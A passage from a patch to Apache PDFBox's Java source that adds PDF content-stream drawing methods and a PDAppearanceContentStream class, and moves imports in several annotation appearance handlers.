"+ throw new IllegalArgumentException(\"Error: unknown value for line join style\");", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Set the line cap style.", + "+ *", + "+ * @param lineCapStyle 0 for butt cap, 1 for round cap, and 2 for projecting square cap.", + "+ * @throws IOException If the content stream could not be written.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ * @throws IllegalArgumentException If the parameter is not a valid line cap style.", + "+ */", + "+ public void setLineCapStyle(int lineCapStyle) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: setLineCapStyle is not allowed within a text block.\");", + "+ }", + "+ if (lineCapStyle >= 0 && lineCapStyle <= 2)", + "+ {", + "+ writeOperand(lineCapStyle);", + "+ writeOperator(\"J\");", + "+ }", + "+ else", + "+ {", + "+ throw new IllegalArgumentException(\"Error: unknown value for line cap style\");", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Set the line dash pattern.", + "+ *", + "+ * @param pattern The pattern array", + "+ * @param phase The phase of the pattern", + "+ * @throws IOException If the content stream could not be written.", + "+ * @throws IllegalStateException If the method was called within a text block.", + "+ */", + "+ public void setLineDashPattern(float[] pattern, float phase) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: setLineDashPattern is not allowed within a text block.\");", + "+ }", + "+ write(\"[\");", + "+ for (float value : pattern)", + "+ {", + "+ writeOperand(value);", + "+ }", + "+ write(\"] \");", + "+ writeOperand(phase);", + "+ writeOperator(\"d\");", + "+ }", + "+", + "+ /**", + "+ * Set the miter limit.", + "+ *", + "+ * @param miterLimit the new miter limit.", + "+ * @throws IOException If the content stream could not be written.", + "+ */", + "+ public void setMiterLimit(float miterLimit) throws IOException", + "+ {", + "+ if (inTextMode)", + "+ {", + "+ throw new IllegalStateException(\"Error: setMiterLimit is not allowed within a text block.\");", + "+ }", + "+ if (miterLimit <= 0.0)", + "+ {", + "+ throw new IllegalArgumentException(\"A miter limit <= 0 is invalid and will not render in Acrobat Reader\");", + "+ }", + "+ writeOperand(miterLimit);", + "+ writeOperator(\"M\");", + "+ }", + "+", + "+ /**", + "+ * Begin a marked content sequence.", + "+ *", + "+ * @param tag the tag", + "+ * @throws IOException If the content stream could not be written", + "+ */", + "+ public void beginMarkedContent(COSName tag) throws IOException", + "+ {", + "+ writeOperand(tag);", + "+ writeOperator(\"BMC\");", + "+ }", + "+", + "+ /**", + "+ * Begin a marked content sequence with a reference to an entry in the page resources'", + "+ * Properties dictionary.", + "+ *", + "+ * @param tag the tag", + "+ * @param propertyList property list", + "+ * @throws IOException If the content stream could not be written", + "+ */", + "+ public void beginMarkedContent(COSName tag, PDPropertyList propertyList) throws IOException", + "+ {", + "+ writeOperand(tag);", + "+ writeOperand(resources.add(propertyList));", + "+ writeOperator(\"BDC\");", + "+ }", + "+", + "+ /**", + "+ * End a marked content sequence.", + "+ *", + "+ * @throws IOException If the content stream could not be written", + "+ */", + "+ public void endMarkedContent() throws IOException", + "+ {", + "+ writeOperator(\"EMC\");", + "+ }", + "+", + "+ /**", + "+ * Set an extended graphics state.", + "+ * ", + "+ * @param state The extended graphics state.", + "+ * @throws IOException If the content stream could not be written.", + "+ */", + "+ public void setGraphicsStateParameters(PDExtendedGraphicsState state) throws IOException", + "+ {", + "+ writeOperand(resources.add(state));", + "+ writeOperator(\"gs\");", + "+ }", + "+", + "+ /**", + "+ * Write a comment line.", + "+ *", + "+ * @param comment", + "+ * @throws IOException If the content stream could not be written.", + "+ * @throws IllegalArgumentException If the comment contains a newline. This is not allowed,", + "+ * because the next line could be ordinary PDF content.", + "+ */", + "+ public void addComment(String comment) throws IOException", + "+ {", + "+ if (comment.indexOf('\\n') >= 0 || comment.indexOf('\\r') >= 0)", + "+ {", + "+ throw new IllegalArgumentException(\"comment should not include a newline\");", + "+ }", + "+ outputStream.write('%');", + "+ outputStream.write(comment.getBytes(Charsets.US_ASCII));", + "+ outputStream.write('\\n');", + "+ }", + "+", + "+ /**", + "+ * Writes a real number to the content stream.", + "+ * @param real", + "+ * @throws java.io.IOException", + "+ */", + "+ protected void writeOperand(float real) throws IOException", + "+ {", + "+ int byteCount = NumberFormatUtil.formatFloatFast(real, formatDecimal.getMaximumFractionDigits(), formatBuffer);", + "+", + "+ if (byteCount == -1)", + "+ {", + "+ //Fast formatting failed", + "+ write(formatDecimal.format(real));", + "+ }", + "+ else", + "+ {", + "+ outputStream.write(formatBuffer, 0, byteCount);", + "+ }", + "+ outputStream.write(' ');", + "+ }", + "+", + "+ /**", + "+ * Writes an integer number to the content stream.", + "+ * @param integer", + "+ * @throws java.io.IOException", + "+ */", + "+ protected void writeOperand(int integer) throws IOException", + "+ {", + "+ write(formatDecimal.format(integer));", + "+ outputStream.write(' ');", + "+ }", + "+", + "+ /**", + "+ * Writes a COSName to the content stream.", + "+ * @param name", + "+ * @throws java.io.IOException", + "+ */", + "+ protected void writeOperand(COSName name) throws IOException", + "+ {", + "+ name.writePDF(outputStream);", + "+ outputStream.write(' ');", + "+ }", + "+", + "+ /**", + "+ * Writes a string to the content stream as ASCII.", + "+ * @param text", + "+ * @throws java.io.IOException", + "+ */", + "+ protected void writeOperator(String text) throws IOException", + "+ {", + "+ outputStream.write(text.getBytes(Charsets.US_ASCII));", + "+ outputStream.write('\\n');", + "+ }", + "+", + "+ /**", + "+ * Writes a string to the content stream as ASCII.", + "+ * @param text", + "+ * @throws java.io.IOException", + "+ */", + "+ protected void write(String text) throws IOException", + "+ {", + "+ outputStream.write(text.getBytes(Charsets.US_ASCII));", + "+ }", + "+", + "+ /**", + "+ * Writes a byte[] to the content stream.", + "+ * @param data", + "+ * @throws java.io.IOException", + "+ */", + "+ protected void write(byte[] data) throws IOException", + "+ {", + "+ outputStream.write(data);", + "+ }", + "+ ", + "+ /**", + "+ * Writes a newline to the content stream as ASCII.", + "+ * @throws java.io.IOException", + "+ */", + "+ protected void writeLine() throws IOException", + "+ {", + "+ outputStream.write('\\n');", + "+ }", + "+", + "+ /**", + "+ * Writes binary data to the content stream.", + "+ * @param data", + "+ * @throws java.io.IOException", + "+ */", + "+ protected void writeBytes(byte[] data) throws IOException", + "+ {", + "+ outputStream.write(data);", + "+ }", + "+", + "+ /**", + "+ * Writes an AffineTransform to the content stream as an array.", + "+ */", + "+ private void writeAffineTransform(AffineTransform transform) throws IOException", + "+ {", + "+ double[] values = new double[6];", + "+ transform.getMatrix(values);", + "+ for (double v : values)", + "+ {", + "+ writeOperand((float) v);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Close the content stream. This must be called when you are done with this object.", + "+ *", + "+ * @throws IOException If the underlying stream has a problem being written to.", + "+ */", + "+ @Override", + "+ public void close() throws IOException", + "+ {", + "+ if (outputStream != null)", + "+ {", + "+ outputStream.close();", + "+ outputStream = null;", + "+ }", + "+ }", + "+", + "+ protected boolean isOutside255Interval(int val)", + "+ {", + "+ return val < 0 || val > 255;", + "+ }", + "+", + "+ private boolean isOutsideOneInterval(double val)", + "+ {", + "+ return val < 0 || val > 1;", + "+ }", + "+", + "+ protected void setStrokingColorSpaceStack(PDColorSpace colorSpace)", + "+ {", + "+ if (strokingColorSpaceStack.isEmpty())", + "+ {", + "+ strokingColorSpaceStack.add(colorSpace);", + "+ }", + "+ else", + "+ {", + "+ strokingColorSpaceStack.setElementAt(colorSpace, strokingColorSpaceStack.size() - 1);", + "+ }", + "+ }", + "+", + "+ protected void setNonStrokingColorSpaceStack(PDColorSpace colorSpace)", + "+ {", + "+ if (nonStrokingColorSpaceStack.isEmpty())", + "+ {", + "+ nonStrokingColorSpaceStack.add(colorSpace);", + "+ }", + "+ else", + "+ {", + "+ nonStrokingColorSpaceStack.setElementAt(colorSpace, nonStrokingColorSpaceStack.size() - 1);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Set the character spacing. The value shall be added to the horizontal or vertical component", + "+ * of the glyph's displacement, depending on the writing mode.", + "+ *", + "+ * @param spacing character spacing", + "+ * @throws IOException If the content stream could not be written.", + "+ */", + "+ public void setCharacterSpacing(float spacing) throws IOException", + "+ {", + "+ writeOperand(spacing);", + "+ writeOperator(\"Tc\");", + "+ }", + "+", + "+ /**", + "+ * Set the word spacing. The value shall be added to the horizontal or vertical component of the", + "+ * ASCII SPACE character, depending on the writing mode.", + "+ *

    ", + "+ * This will have an effect only with Type1 and TrueType fonts, not with Type0 fonts. The PDF", + "+ * specification tells why: \"Word spacing shall be applied to every occurrence of the", + "+ * single-byte character code 32 in a string when using a simple font or a composite font that", + "+ * defines code 32 as a single-byte code. It shall not apply to occurrences of the byte value 32", + "+ * in multiple-byte codes.\"", + "+ *", + "+ * @param spacing word spacing", + "+ * @throws IOException If the content stream could not be written.", + "+ */", + "+ public void setWordSpacing(float spacing) throws IOException", + "+ {", + "+ writeOperand(spacing);", + "+ writeOperator(\"Tw\");", + "+ }", + "+", + "+ /**", + "+ * Set the horizontal scaling to scale / 100.", + "+ *", + "+ * @param scale number specifying the percentage of the normal width. Default value: 100 (normal", + "+ * width).", + "+ * @throws IOException If the content stream could not be written.", + "+ */", + "+ public void setHorizontalScaling(float scale) throws IOException", + "+ {", + "+ writeOperand(scale);", + "+ writeOperator(\"Tz\");", + "+ }", + "+}", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "new file mode 100644", + "index 000000000..a67e56735", + "--- /dev/null", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "@@ -0,0 +1,245 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+package org.apache.pdfbox.pdmodel;", + "+", + "+import java.io.Closeable;", + "+import java.io.IOException;", + "+import java.io.OutputStream;", + "+", + "+import org.apache.pdfbox.cos.COSName;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", + "+", + "+/**", + "+ * Provides the ability to write to a page content stream.", + "+ *", + "+ * @author Ben Litchfield", + "+ */", + "+public final class PDAppearanceContentStream extends PDAbstractContentStream implements Closeable", + "+{", + "+ /**", + "+ * Create a new appearance stream.", + "+ *", + "+ * @param appearance", + "+ * The appearance stream to write to.", + "+ * @throws IOException", + "+ * If there is an error writing to the page contents.", + "+ */", + "+ public PDAppearanceContentStream(PDAppearanceStream appearance) throws IOException", + "+ {", + "+ this(appearance, appearance.getStream().createOutputStream());", + "+ }", + "+", + "+ /**", + "+ * Create a new appearance stream. Note that this is not actually a \"page\"", + "+ * content stream.", + "+ *", + "+ * @param appearance", + "+ * The appearance stream to add to.", + "+ * @param outputStream", + "+ * The appearances output stream to write to.", + "+ */", + "+ public PDAppearanceContentStream(PDAppearanceStream appearance, OutputStream outputStream)", + "+ {", + "+ super(outputStream);", + "+ setResources(appearance.getResources());", + "+ }", + "+", + "+ /**", + "+ * Set the stroking color.", + "+ * ", + "+ *

    ", + "+ * The command is only emitted if the color is not null and the number of", + "+ * components is gt 0.", + "+ * ", + "+ * @see PDAbstractContentStream#setStrokingColor(PDColor)", + "+ */", + "+ public boolean setStrokingColorOnDemand(PDColor color) throws IOException", + "+ {", + "+ if (color != null)", + "+ {", + "+ float[] components = color.getComponents();", + "+ if (components.length > 0)", + "+ {", + "+ setStrokingColor(components);", + "+ return true;", + "+ }", + "+ }", + "+ return false;", + "+ }", + "+", + "+ /**", + "+ * Set the stroking color.", + "+ * ", + "+ * @see PDAbstractContentStream#setStrokingColor(java.awt.Color)", + "+ * @param components", + "+ * the color components dependent on the color space being used.", + "+ * @throws IOException", + "+ * if an IO error occurs while writing to the stream.", + "+ */", + "+ public void setStrokingColor(float[] components) throws IOException", + "+ {", + "+ for (float value : components)", + "+ {", + "+ writeOperand(value);", + "+ }", + "+", + "+ int numComponents = components.length;", + "+ switch (numComponents)", + "+ {", + "+ case 1:", + "+ writeOperator(\"G\");", + "+ break;", + "+ case 3:", + "+ writeOperator(\"RG\");", + "+ break;", + "+ case 4:", + "+ writeOperator(\"K\");", + "+ break;", + "+ default:", + "+ break;", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Set the non stroking color.", + "+ * ", + "+ *

    ", + "+ * The command is only emitted if the color is not null and the number of", + "+ * components is gt 0.", + "+ * ", + "+ * @see PDAbstractContentStream#setNonStrokingColor(PDColor)", + "+ */", + "+ public boolean setNonStrokingColorOnDemand(PDColor color) throws IOException", + "+ {", + "+ if (color != null)", + "+ {", + "+ float[] components = color.getComponents();", + "+ if (components.length > 0)", + "+ {", + "+ setNonStrokingColor(components);", + "+ return true;", + "+ }", + "+ }", + "+ return false;", + "+ }", + "+", + "+ /**", + "+ * Set the non stroking color.", + "+ * ", + "+ * @see PDAbstractContentStream#setNonStrokingColor(java.awt.Color)", + "+ * @param components", + "+ * the color components dependent on the color space being used.", + "+ * @throws IOException", + "+ * if an IO error occurs while writing to the stream.", + "+ */", + "+ public void setNonStrokingColor(float[] components) throws IOException", + "+ {", + "+ for (float value : components)", + "+ {", + "+ writeOperand(value);", + "+ }", + "+", + "+ int numComponents = components.length;", + "+ switch (numComponents)", + "+ {", + "+ case 1:", + "+ writeOperator(\"g\");", + "+ break;", + "+ case 3:", + "+ writeOperator(\"rg\");", + "+ break;", + "+ case 4:", + "+ writeOperator(\"k\");", + "+ break;", + "+ default:", + "+ break;", + "+ }", + "+ }", + "+", + "+ public void setBorderLine(float lineWidth, PDBorderStyleDictionary bs) throws IOException", + "+ {", + "+ // Can't use PDBorderStyleDictionary.getDashStyle() as", + "+ // this will return a default dash style if non is existing", + "+ if (bs != null && bs.getCOSObject().containsKey(COSName.D) && ", + "+ bs.getStyle().equals(PDBorderStyleDictionary.STYLE_DASHED))", + "+ {", + "+ setLineDashPattern(bs.getDashStyle().getDashArray(), 0);", + "+ }", + "+ setLineWidthOnDemand(lineWidth);", + "+ }", + "+", + "+ /**", + "+ * Sets the line width. The command is only emitted if the lineWidth is", + "+ * different to 1.", + "+ * ", + "+ * @param lineWidth the line width of the path.", + "+ * @throws java.io.IOException", + "+ * @see PDAbstractContentStream#setLineWidth(float)", + "+ */", + "+ public void setLineWidthOnDemand(float lineWidth) throws IOException", + "+ {", + "+ // Acrobat doesn't write a line width command", + "+ // for a line width of 1 as this is default.", + "+ // Will do the same.", + "+ if (!(Math.abs(lineWidth - 1) < 1e-6))", + "+ {", + "+ setLineWidth(lineWidth);", + "+ }", + "+ }", + "+ ", + "+ /**", + "+ * Draw a shape.", + "+ *", + "+ *

    ", + "+ * Dependent on the lineWidth and whether or not there is a background to be generated there are", + "+ * different commands to be used for draw a shape.", + "+ *", + "+ * @param lineWidth the line width of the path.", + "+ * @param hasStroke shall there be a stroking color.", + "+ * @param hasFill shall there be a fill color.", + "+ * @throws IOException if an IO error occurs while writing to the stream.", + "+ */", + "+ public void drawShape(float lineWidth, boolean hasStroke, boolean hasFill) throws IOException", + "+ {", + "+ // initial setting if stroking shall be done", + "+ boolean resolvedHasStroke = hasStroke;", + "+", + "+ // no stroking for very small lines", + "+ if (lineWidth < 1e-6)", + "+ {", + "+ resolvedHasStroke = false;", + "+ }", + "+ if (hasFill && resolvedHasStroke)", + "+ {", + "+ fillAndStroke();", + "+ }", + "+ else if (resolvedHasStroke)", + "+ {", + "+ stroke();", + "+ }", + "+ else if (hasFill)", + "+ {", + "+ fill();", + "+ }", + "+ else", + "+ {", + "+ writeOperator(\"n\");", + "+ }", + "+ }", + "+}", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", + "index 041e583c3..c2516de8a 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", + "@@ -18,3 +18,3 @@ package org.apache.pdfbox.pdmodel;", + " import java.io.IOException;", + "-import org.apache.pdfbox.contentstream.PDAbstractContentStream;", + "+", + " import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", + "@@ -25,3 +25,3 @@ import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", + " */", + "-public class PDFormContentStream extends PDAbstractContentStream", + "+public final class PDFormContentStream extends PDAbstractContentStream", + " {", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index bc0743854..6d4cc2bb4 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -40,3 +40,2 @@ import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", + " import org.apache.fontbox.ttf.model.GsubData;", + "-import org.apache.pdfbox.contentstream.PDAbstractContentStream;", + " import org.apache.pdfbox.cos.COSArray;", + "@@ -70,3 +69,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- ", + " /**", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", + "index eb91689b2..bce28f614 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", + "@@ -18,3 +18,3 @@ package org.apache.pdfbox.pdmodel;", + " import java.io.IOException;", + "-import org.apache.pdfbox.contentstream.PDAbstractContentStream;", + "+", + " import org.apache.pdfbox.pdmodel.graphics.pattern.PDTilingPattern;", + "@@ -25,3 +25,3 @@ import org.apache.pdfbox.pdmodel.graphics.pattern.PDTilingPattern;", + " */", + "-public class PDPatternContentStream extends PDAbstractContentStream", + "+public final class PDPatternContentStream extends PDAbstractContentStream", + " {", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "index 70dd019d2..7eeaf7790 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "@@ -26,3 +26,3 @@ import java.util.ArrayList;", + " import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "index c5be7ec98..237894792 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "@@ -29,3 +29,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquareCircle;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceDictionary;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "index 3422cef96..37ed620c5 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "@@ -23,3 +23,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationCaret;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "index e6258467f..44597db82 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "@@ -28,3 +28,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationCircle;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", + "index 59aa9f0c9..9dbe3e54d 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", + "@@ -33,3 +33,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationHighlight;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", + "index 55e9e3b11..eaf4bbb81 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", + "@@ -24,3 +24,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationInk;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index 8ba70da90..cef278c71 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -23,3 +23,3 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "-import org.apache.pdfbox.contentstream.PDAbstractContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAbstractContentStream;", + " import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "@@ -29,3 +29,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.util.Matrix;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", + "index aca2bc378..95d6bcfeb 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", + "@@ -31,3 +31,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLink;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "index c7ad9846e..a2823dc5c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "@@ -29,3 +29,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolygon;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "index 18c59cd6a..9512c613f 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "@@ -29,3 +29,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolyline;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "index 31c295432..26dc670b5 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "@@ -30,3 +30,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquare;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "index 6cf33d043..e94159df5 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "@@ -25,3 +25,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", 